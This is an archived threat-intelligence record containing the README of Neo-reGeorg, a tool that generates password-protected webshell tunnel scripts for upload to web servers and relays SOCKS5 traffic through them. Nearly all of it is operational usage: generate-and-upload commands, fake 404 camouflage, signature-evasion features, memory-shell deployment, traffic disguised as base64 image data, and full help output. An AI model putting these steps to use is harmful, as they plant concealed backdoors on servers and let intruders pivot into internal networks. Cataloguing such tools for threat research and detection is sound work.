{
	"id": "78fa2023-efe0-491e-82af-7c7e4b8bb135",
	"created_at": "2026-04-06T00:19:31.806815Z",
	"updated_at": "2026-04-10T03:21:39.310424Z",
	"deleted_at": null,
	"sha1_hash": "318600b2d53bf2719e065ae0a2bb733e904b90c8",
	"title": "GitHub - L-codes/Neo-reGeorg: Neo-reGeorg is a project that seeks to aggressively refactor reGeorg",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 138908,
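	"plain_text": "GitHub - L-codes/Neo-reGeorg: Neo-reGeorg is a project that seeks to aggressively refactor reGeorg\r\nBy L-codes\r\nArchived: 2026-04-05 20:10:11 UTC\r\nNeo-reGeorg is a project that seeks to aggressively refactor reGeorg, with the goals of:\r\nImproving usability and avoiding signature-based detection\r\nImproving tunnel connection security\r\nImproving the confidentiality of transmitted content\r\nSupporting use in more network environments\r\nThis tool is limited to security research and teaching. The user bears all legal and related responsibility arising from the use of this tool! The author assumes no legal or related responsibility!\r\nVersion\r\n5.3.0 - Change log\r\nFeatures\r\nTransmitted content is encrypted with a modified base64 scheme and disguised as base64 encoding\r\nData is transmitted in the BLV (Byte-LengthOffset-Value) format\r\nThe response to direct requests is customizable (e.g. a fake 404 page)\r\nRequest template support\r\nCustomizable HTTP headers\r\nCustom HTTP response code\r\nRandom requests across multiple URLs\r\nServer-side DNS resolution\r\nCompatible with python2 / python3\r\nHigh compatibility with server environments, including special cases such as unstable servers or a server-side script deployed on only some machines behind a load balancer\r\n(php only) Following pivotnacci, multiple TCP connections are created within a single Session to handle some load-balancing scenarios\r\naspx/ashx/jsp/jspx no longer depend on Session and run normally in harsh environments such as those without cookies\r\n(except php and nodejs) Intranet forwarding is supported to handle load-balanced environments\r\nThe server can be started as a separate process to handle more scenarios\r\nPython dependencies\r\nhttps://github.com/L-codes/Neo-reGeorg/tree/master\r\npython -m pip install requests\r\n# Optional\r\npython -m pip install requests[socks] # socks5 proxy support\r\npython -m pip install curl-cffi # use the curl-cffi library instead, for better performance and stability\r\npython -m pip install requests_ntlm # NTLM authentication support\r\nBasic Usage\r\nStep 1. Set a password to generate tunnel.(aspx|ashx|jsp|jspx|php) and upload it to the web server\r\n$ python neoreg.py generate -k password\r\n [+] Create neoreg server files:\r\n =\u003e neoreg_servers/tunnel.jsp\r\n =\u003e neoreg_servers/tunnel.jspx\r\n =\u003e neoreg_servers/tunnel.ashx\r\n =\u003e neoreg_servers/tunnel.aspx\r\n =\u003e neoreg_servers/tunnel.php\r\n =\u003e neoreg_servers/tunnel.go\r\nStep 2. Use neoreg.py to connect to the web server and create a local socks5 proxy\r\n$ python3 neoreg.py -k password -u http://xx/tunnel.php\r\n+------------------------------------------------------------------------+\r\n Log Level set to [DEBUG]\r\n Starting socks server [127.0.0.1:1080]\r\n Tunnel at:\r\n http://xx/tunnel.php\r\n+------------------------------------------------------------------------+\r\nAdvanced Usage\r\n1. 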
The generated server script can, by default, respond to direct requests with specified page content (e.g. a fake 404 page)\r\n$ python neoreg.py generate -k \u003cyou_password\u003e --file 404.html --httpcode 404\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003cserver_url\u003e --skip\r\n2. If the server-side web service can only be reached through a proxy\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003cserver_url\u003e --proxy socks5://10.1.1.1:8080\r\n3. If Authorization or a custom Header or Cookie is required\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003cserver_url\u003e -H 'Authorization: cm9vdDppcyB0d2VsdmU=' --cooki\r\n4. To spread requests out, the script can be uploaded to multiple paths, e.g. as a memory shell\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003curl_1\u003e -u \u003curl_2\u003e -u \u003curl_3\u003e ...\r\n5. Enable intranet forwarding to handle load balancing\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003curl\u003e -r \u003credirect_url\u003e\r\n6. Use port forwarding instead of starting the socks5 service ( 127.0.0.1:1080 -\u003e ip:port )\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003curl\u003e -t \u003cip:port\u003e\r\n7. Set a request body template (it must also be specified when running generate)\r\n# The request content is substituted in place of NEOREGBODY\r\n$ python3 neoreg.py -k password -T 'img=data:image/png;base64,NEOREGBODY\u0026save=ok'\r\n$ python3 neoreg.py -k password -T 'img=data:image/png;base64,NEOREGBODY\u0026save=ok' -u http://127.0.0.1\r\n# NOTE The template content may be written to a file and passed as -T file\r\n8. A Neoreg server can be started as a separate process to cope with harsh special environments (use your imagination) :)\r\n$ go run neoreg_servers/tunnel.go 8000\r\n$ python3 neoreg.py -k password -u http://127.0.0.1:8000/anysting\r\n9. 
Node.js is supported in memory-shell form; change the path via const path = '/proxy_path'; in the js file, and pass the --async-connect parameter when connecting\r\n$ python3 neoreg.py -k password --async-connect -u http://127.0.0.1:8000/proxy_path\r\nFor more parameters related to performance and stability, see the -h help output\r\n# Generate the server-side script\r\n$ python neoreg.py generate -h\r\n usage: neoreg.py [-h] -k KEY [-o DIR] [-f FILE] [-c CODE] [--read-buff Bytes]\r\n [--max-read-size KB]\r\n Generate neoreg webshell\r\noptional arguments:\r\n -h, --help show this help message and exit\r\n -k KEY, --key KEY Specify connection key.\r\n -o DIR, --outdir DIR Output directory.\r\n -f FILE, --file FILE Camouflage html page file\r\n -c CODE, --httpcode CODE\r\n Specify HTTP response code. When using -r, it is\r\n recommended to \u003c400 (default: 200)\r\n -T STR/FILE, --request-template STR/FILE\r\n HTTP request template (eg:\r\n 'img=data:image/png;base64,NEOREGBODY\u0026save=ok')\r\n --read-buff Bytes Remote read buffer (default: 513)\r\n --max-read-size KB Remote max read size (default: 512)\r\n# Connect to the server\r\n$ python neoreg.py -h\r\n usage: neoreg.py [-h] -u URI [-r URL] [-R] [-t IP:PORT] -k KEY [-l IP]\r\n [-p PORT] [-s] [-H LINE] [-c LINE] [-x LINE] [-T STR/FILE]\r\n [-a] [--php-skip-cookie] [--go] [--php-connect-timeout S]\r\n [--local-dns] [--read-buff KB] [--read-interval MS]\r\n [--write-interval MS] [--max-threads N] [--max-retry N]\r\n [--cut-left N] [--cut-right N] [--extract EXPR]\r\n [--ntlm-auth USER:PASS] [-v]\r\n Socks server for Neoreg HTTP(s) tunneller (DEBUG MODE: -k debug)\r\n optional arguments:\r\n -h, --help show this help message and exit\r\n -u URI, --url URI The url containing the tunnel script\r\n -r URL, --redirect-url URL\r\n Intranet forwarding the designated server (only\r\n java/.net)\r\n -R, --force-redirect Forced forwarding (only jsp -r)\r\n -t IP:PORT, --target IP:PORT\r\n Network forwarding Target, After setting this\r\n parameter, port forwarding will be enabled\r\n -k KEY, --key KEY Specify 
connection key\r\n -l IP, --listen-on IP\r\n The default listening address (default: 127.0.0.1)\r\n -p PORT, --listen-port PORT\r\n The default listening port (default: 1080)\r\n -s, --skip Skip usability testing\r\n -H LINE, --header LINE\r\n Pass custom header LINE to server\r\n -c LINE, --cookie LINE\r\n Custom init cookies\r\n -x LINE, --proxy LINE\r\nProto://host[:port] Use proxy on given port\n -T STR/FILE, --request-template STR/FILE\n HTTP request template (eg:\n 'img=data:image/png;base64,NEOREGBODY\u0026save=ok')\n -a, --async-connect Asynchronous CONNECT (e.g., in PHP, Node.js)\n --php-skip-cookie Skip cookie availability check in php\n --go Use go connection method\n --php-connect-timeout S\n PHP connect timeout (default: 0.5)\n --local-dns Use local resolution DNS\n --read-buff KB Local read buffer, max data to be sent per POST\n (default: 7, max: 50)\n --read-interval MS Read data interval in milliseconds (default: 300)\n --write-interval MS Write data interval in milliseconds (default: 200)\n --max-threads N Proxy max threads (default: 400)\n --max-retry N Max retry requests (default: 10)\n --cut-left N Truncate the left side of the response body\n --cut-right N Truncate the right side of the response body\n --extract EXPR Manually extract BODY content (eg:\n\nNEOREGBODY\n\n)\n --ntlm-auth USER:PASS\n Enable NTLM authentication for web requests (format:\n DOMAIN\\USER:PASSWORD or USER:PASSWORD)\n -v Increase verbosity level (use -vv or more for greater\n effect)\nRemind\nWhen running neoreg.py on Mac OSX, high-concurrency requests can cause network packet loss; use ulimit -n 2560 to raise the current shell's \"maximum number of open files\"\nLicense\nGPL 3.0\nSource: https://github.com/L-codes/Neo-reGeorg/tree/master",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://github.com/L-codes/Neo-reGeorg/tree/master"
	],
	"report_names": [
		"master"
	],
	"threat_actors": [],
	"ts_created_at": 1775434771,
	"ts_updated_at": 1775791299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/318600b2d53bf2719e065ae0a2bb733e904b90c8.pdf",
		"text": "https://archive.orkl.eu/318600b2d53bf2719e065ae0a2bb733e904b90c8.txt",
		"img": "https://archive.orkl.eu/318600b2d53bf2719e065ae0a2bb733e904b90c8.jpg"
	}
}